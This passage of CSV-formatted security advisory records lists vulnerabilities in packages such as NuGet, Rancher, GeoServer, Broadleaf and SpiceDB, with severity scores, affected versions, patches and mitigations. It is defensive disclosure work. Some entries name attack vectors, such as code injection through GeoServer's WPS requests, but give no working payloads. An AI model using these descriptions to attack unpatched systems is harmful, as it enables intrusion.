attackers to execute arbitrary code via a crafted XML file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'easy-parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26710'}, {'type': 'WEB', 'url': 'https://github.com/uncmath25/easy-parse/issues/3'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/easy-parse/PYSEC-2023-97.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/uncmath25/easy-parse'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:36:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-g98v-hv3f-hcfr,2023-07-10T19:11:40Z,2023-06-30T20:21:59Z,,[],atty potential unaligned read,"On windows, `atty` dereferences a potentially unaligned pointer. In practice however, the pointer won't be unaligned unless a custom global allocator is used. In particular, the `System` allocator on windows uses `HeapAlloc`, which guarantees a large enough alignment. # atty is Unmaintained A Pull Request with a fix has been provided over a year ago but the maintainer seems to be unreachable. Last release of `atty` was almost 3 years ago. ## Possible Alternative(s) The below list has not been vetted in any way and may or may not contain alternatives; - [std::io::IsTerminal](https://doc.rust-lang.org/stable/std/io/trait.IsTerminal.html) - Stable since Rust 1.70.0\n - [is-terminal](https://crates.io/crates/is-terminal) - Standalone crate supporting Rust older than 1.70.0"" ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'atty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/softprops/atty/issues/50'}, {'type': 'WEB', 'url': 'https://github.com/softprops/atty/pull/51'}, {'type': 'PACKAGE', 'url': 'https://github.com/softprops/atty'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0145.html'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:21:59Z', 'nvd_published_at': None}" 1.4.0,GHSA-p4c9-x742-qh8c,2023-06-27T21:01:15Z,2023-06-14T15:30:38Z,,['CVE-2023-34616'],pbjson vulnerable to stack exhaustion,An issue was discovered pbjson through 0.4.0 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.progsbase.libraries:JSON'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34616'}, {'type': 'WEB', 'url': 'https://github.com/InductiveComputerScience/pbJson/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/InductiveComputerScience/pbJson'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:47:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-6qmf-mmc7-6c2p,2023-06-16T17:52:20Z,2023-06-14T16:44:21Z,,['CVE-2023-29337'],NuGet Client Remote Code Execution Vulnerability,"### Description Microsoft is releasing this security advisory to provide information about a vulnerability in .NET and NuGet on Linux. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET 6.0, .NET 7.0 and NuGet(nuget.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement) where a potential race condition that can lead to a symlink attack on Linux. Non-Linux platforms are not affected. ### Affected software This issue only affects Linux systems. #### NuGet & NuGet Packages - Any NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement 6.6.0 version or earlier. - Any NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement 6.5.0 version or earlier. - Any NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement 6.4.1 version or earlier. - Any NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement 6.3.2 version or earlier. - Any NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement 6.2.3 version or earlier. - Any NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement 6.0.4 version or earlier. - Any NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, Microsoft.Build.NuGetSdkResolver, NuGet.PackageManagement 5.11.4 #### .NET SDK(s) - Any .NET SDK 7.0.106 or earlier, or 7.0.303 or earlier - Any .NET SDK 6.0.117 or earlier, or 6.0.312 or earlier, or 6.0.409 or earlier. ### Patches To fix the issue, please install the latest version of .NET 6.0 or .NET 7.0 and NuGet (NuGet.exe, NuGet.Protocol, NuGet.Common, NuGet.CommandLine, NuGet.Commands, NuGet.PackageManagement versions). If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. - If you're using NuGet.exe 6.6.0 or lower, you should download and install 6.6.1 from https://dist.nuget.org/win-x86-commandline/v6.6.1/nuget.exe. - If you're using NuGet.exe 6.5.0 or lower, you should download and install 6.5.1 from https://dist.nuget.org/win-x86-commandline/v6.5.1/nuget.exe. - If you're using NuGet.exe 6.4.1 or lower, you should download and install 6.4.2 from https://dist.nuget.org/win-x86-commandline/v6.4.2/nuget.exe. - If you're using NuGet.exe 6.3.2 or lower, you should download and install 6.3.3 from https://dist.nuget.org/win-x86-commandline/v6.3.3/nuget.exe. - If you're using NuGet.exe 6.2.3 or lower, you should download and install 6.2.4 from https://dist.nuget.org/win-x86-commandline/v6.2.4/nuget.exe. - If you're using NuGet.exe 6.0.4 or lower, you should download and install 6.0.5 from https://dist.nuget.org/win-x86-commandline/v6.0.5/nuget.exe. - If you're using NuGet.exe 5.11.4 or lower, you should download and install 5.11.5 from https://dist.nuget.org/win-x86-commandline/v5.11.5/nuget.exe. - If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.107 or SDK 7.0.304 from https://dotnet.microsoft.com/download/dotnet-core/7.0. - If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.107 or SDK 7.0.304 from https://dotnet.microsoft.com/download/dotnet-core/7.0. - If you're using .NET 6.0, you should download and install Runtime 6.0.18 or SDK 6.0.118 or SDK 6.0.312 from https://dotnet.microsoft.com/download/dotnet-core/6.0. ### Other details Announcement for this issue can be found at https://github.com/NuGet/Announcements/issues/69 MSRC details for this can be found at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29337 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.Build.NuGetSdkResolver'}, 'versions': ['5.9.0-rc.7122']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.PackageManagement'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.PackageManagement'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.4'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.PackageManagement'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.3'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.PackageManagement'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.4.0'}, {'fixed': '6.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.PackageManagement'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.5.0'}, {'fixed': '6.5.1'}]}], 'versions': ['6.5.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.PackageManagement'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.6.0'}, {'fixed': '6.6.1'}]}], 'versions': ['6.6.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.Build.NuGetSdkResolver'}, 'versions': ['5.10.0-rc.7240']}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.Build.NuGetSdkResolver'}, 'versions': ['5.11.0-rc.10']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Commands'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Commands'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.4'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Commands'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.3'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Commands'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.4.0'}, {'fixed': '6.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Commands'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.5.0'}, {'fixed': '6.5.1'}]}], 'versions': ['6.5.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Commands'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.6.0'}, {'fixed': '6.6.1'}]}], 'versions': ['6.6.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.CommandLine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.CommandLine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.4'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.CommandLine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.3'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.CommandLine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.4.0'}, {'fixed': '6.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.CommandLine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.5.0'}, {'fixed': '6.5.1'}]}], 'versions': ['6.5.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.CommandLine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.6.0'}, {'fixed': '6.6.1'}]}], 'versions': ['6.6.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.4'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.3'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.4.0'}, {'fixed': '6.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.5.0'}, {'fixed': '6.5.1'}]}], 'versions': ['6.5.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.6.0'}, {'fixed': '6.6.1'}]}], 'versions': ['6.6.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Protocol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Protocol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.4'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Protocol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.3'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Protocol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.4.0'}, {'fixed': '6.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Protocol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.5.0'}, {'fixed': '6.5.1'}]}], 'versions': ['6.5.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Protocol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.6.0'}, {'fixed': '6.6.1'}]}], 'versions': ['6.6.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.PackageManagement'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '5.11.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Commands'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '5.11.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.CommandLine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '5.11.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '5.11.5'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'NuGet.Protocol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '5.11.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NuGet/NuGet.Client/security/advisories/GHSA-6qmf-mmc7-6c2p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29337'}, {'type': 'PACKAGE', 'url': 'https://github.com/NuGet/NuGet.Client'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29337'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T16:44:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-p976-h52c-26p6,2023-06-06T02:00:28Z,2023-06-06T02:00:28Z,,['CVE-2023-22647'],Rancher vulnerable to Privilege Escalation via manipulation of Secrets,"### Impact A vulnerability has been identified which enables [Standard users](https://ranchermanager.docs.rancher.com/how-to-guides/new-user-guides/authentication-permissions-and-global-configuration/manage-role-based-access-control-rbac/global-permissions) or above to elevate their permissions to Administrator in the `local` cluster. The `local` cluster means the cluster where Rancher is installed. It is named `local` inside the list of clusters in the Rancher UI. Standard users could leverage their existing permissions to manipulate Kubernetes secrets in the `local` cluster, resulting in the secret being deleted, but their read-level permissions to the secret being preserved. When this operation was followed-up by other specially crafted commands, it could result in the user gaining access to tokens belonging to service accounts in the `local` cluster. Users that have custom global roles which grant `create` and `delete` permissions on `secrets` would also be able to exploit this vulnerability. Users with [audit logs enabled](https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#enabling-api-audit-log) in Rancher can try to identify possible abuses of this issue by going through the logs. To sieve through the data filter by `kind: Secret` with `type: provisioning.cattle.io/cloud-credential`, then investigate all log entries that affect that specific resource. A secondary check would be to filter by all operations with `Opaque` Secrets within the `cattle-global-data` namespace. After patching, it is recommended that users review access methods to Rancher (including RBAC policies, tokens, and host-level node access), to ensure that no changes were made to persist access to users who have leveraged this vulnerability. ### Patches Patched versions include releases `2.6.13`, `2.7.4` and later versions. ### Workarounds There is no direct mitigation besides updating Rancher to a patched version. ### For more information If you have any questions or comments about this advisory: - Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries. - Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository. - Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rancher/rancher/security/advisories/GHSA-p976-h52c-26p6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22647'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=CVE-2023-22647'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.6.13'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.7.4'}]","{'cwe_ids': ['CWE-269', 'CWE-281'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:00:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-59x6-g4jr-4hxc,2023-09-20T14:06:24Z,2023-06-12T15:30:29Z,,['CVE-2023-35042'],GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language,"GeoServer 2, in some configurations, allows remote attackers to execute arbitrary code via `java.lang.Runtime.getRuntime().exec` in `wps:LiteralData` within a `wps:Execute` request, as exploited in the wild in June 2023. ## RCE in Jiffle The Jiffle map algebra language, provided by jai-ext, allows efficiently execute map algebra over large images. A vulnerability [CVE-2022-24816](https://nvd.nist.gov/vuln/detail/CVE-2022-24816) has been recently found in Jiffle, that allows a Code Injection to be performed by properly crafting a Jiffle invocation. In the case of GeoServer, the injection can be performed from a remote request. ## Assessment GeoTools includes the Jiffle language as part of the `gt-process-raster-` module, applications using it should check whether it’s possible to provide a Jiffle script from remote, and if so, upgrade or remove the functionality (see also the GeoServer mitigation, below). The issue is of particular interest for GeoServer users, as GeoServer embeds Jiffle in the base WAR package. Jiffle is available as a OGC function, for usage in SLD rendering transformations. This allows for a Remote Code Execution in properly crafted OGC requests, as well as from the administration console, when editing SLD files. ## Mitigations In case you cannot upgrade at once, then the following mitigation is strongly recommended: 1. Stop GeoServer 2. Open the war file, get into `WEB-INF/lib` and remove the `janino-.jar` 3. Restart GeoServer. This effectively removes the Jiffle ability to compile scripts in Java code, from any of the potential attack vectors (Janino is the library used to turn the Java code generated from the Jiffle script, into executable bytecode). GeoServer should still work properly after the removal, but any attempt to use Jiffle will result in an exception.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.18.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wfs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.18.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.19.0'}, {'fixed': '2.19.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wfs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.19.0'}, {'fixed': '2.19.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.20.0'}, {'fixed': '2.20.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wfs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.20.0'}, {'fixed': '2.20.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wps'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.18.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wps'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.19.0'}, {'fixed': '2.19.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver:gs-wps'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.20.0'}, {'fixed': '2.20.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35042'}, {'type': 'WEB', 'url': 'https://docs.geoserver.org/stable/en/user/services/wps/operations.html#execute'}, {'type': 'WEB', 'url': 'https://geoserver.org/vulnerability/2022/04/11/geoserver-2-jiffle-jndi-rce.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/geoserver/geoserver'}, {'type': 'WEB', 'url': 'https://isc.sans.edu/diary/29936'}, {'type': 'WEB', 'url': 'https://osgeo-org.atlassian.net/browse/GEOS-10458'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-09-19T20:27:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-3862-fmr3-4f3h,2023-07-05T19:52:19Z,2023-06-21T18:31:08Z,,['CVE-2023-33725'],Broadleaf vulnerable to Cross-site Scripting,Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address. This is fixed in 6.2.7-GA.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.broadleafcommerce:broadleaf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0-GA'}, {'fixed': '6.2.7-GA'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33725'}, {'type': 'PACKAGE', 'url': 'https://github.com/BroadleafCommerce/BroadleafCommerce'}, {'type': 'WEB', 'url': 'https://github.com/Contrast-Security-OSS/Burptrast/tree/main/docs/CVE-2023-33725'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T21:59:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-hm75-8w6h-4f8f,2023-06-30T20:17:57Z,2023-06-23T15:30:43Z,,['CVE-2023-3302'],Admidio Improper Neutralization of Formula Elements in a CSV File vulnerability,Admidio prior to 4.2.9 is vulnerable toImproper Neutralization of Formula Elements in a CSV File.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3302'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/c87a7074a1a73c4851263060afd76aa4d5b6415f'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5e18619f-8379-464a-aad2-65883bb4e81a'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:46:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-7xpv-4pm9-xch2,2023-06-02T19:41:31Z,2023-06-02T19:41:31Z,,['CVE-2023-33964'],mx-chain-go does not treat invalid transaction with wrong username correctly,"### Impact Metachain cannot process a cross-shard miniblock. An invalid transaction with the wrong username on metachain is not treated correctly on the metachain transaction processor. This is strictly a processing issue that could have happened on MultiversX chain. If an error like this had occurred, the metachain would have stopped notarizing blocks from the shard chains. The resuming of notarization is possible only after applying a patched binary version. ### Patches Introduce processIfTxErrorCrossShard for metachain transaction processor. ### Workarounds No ### References No ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/multiversx/mx-chain-go'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/multiversx/mx-chain-go/security/advisories/GHSA-7xpv-4pm9-xch2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33964'}, {'type': 'WEB', 'url': 'https://github.com/multiversx/mx-chain-go/commit/97295471465f4b5f79e51b32f8b7111f8d921606'}, {'type': 'PACKAGE', 'url': 'https://github.com/multiversx/mx-chain-go'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T19:41:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-m54h-5x5f-5m6r,2023-06-30T20:25:41Z,2023-06-28T22:48:50Z,,['CVE-2023-35930'],SpiceDB's LookupResources may return partial results,"### Impact Any user making a negative authorization decision based on the results of a LookupResources request with 1.22.0 is affected. For example, using `LookupResources` to find a list of resources to allow access to be okay: some subjects that should have access to a resource may not. But if using `LookupResources` to find a list of banned resources instead, then some users that shouldn't have access may. Generally, `LookupResources` is not and should not be used to gate access in this way - that's what the `Check` API is for. Additionally, version 1.22.0 has included a warning about this bug since its initial release. ### Workarounds Avoid using `LookupResources` for negative authorization decisions if using `1.22.0`. ### Patches The only affected release is [v1.22.0](https://github.com/authzed/spicedb/releases/tag/v1.22.0), and it is patched in [v1.22.2](https://github.com/authzed/spicedb/releases/tag/v1.22.2) (there is no v1.22.1 release, though there is a git tag). ### References - https://github.com/authzed/spicedb/pull/1397 ### For more information If you have any questions or comments about this advisory: * Open an issue in [SpiceDB](https://github.com/authzed/spicedb) * Ask a question in the [SpiceDB Discord](https://authzed.com/discord) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/authzed/spicedb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.22.0'}, {'fixed': '1.22.2'}]}], 'versions': ['1.22.0']}]","[{'type': 'WEB', 'url': 'https://github.com/authzed/spicedb/security/advisories/GHSA-m54h-5x5f-5m6r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35930'}, {'type': 'WEB', 'url': 'https://github.com/authzed/spicedb/pull/1397'}, {'type': 'PACKAGE', 'url': 'https://github.com/authzed/spicedb'}, {'type': 'WEB', 'url': 'https://github.com/authzed/spicedb/releases/tag/v1.22.2'}]","{'cwe_ids': ['CWE-913'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-28T22:48:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-fjpj-2g6w-x25r,2023-06-27T21:57:13Z,2023-06-15T16:28:08Z,,['CVE-2023-34454'],snappy-java's Integer Overflow vulnerability in compress leads to DoS,"## Summary Due to unchecked multiplications, an integer overflow may occur, causing an unrecoverable fatal error. ## Impact Denial of Service ## Description The function [compress(char[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L169) in the file 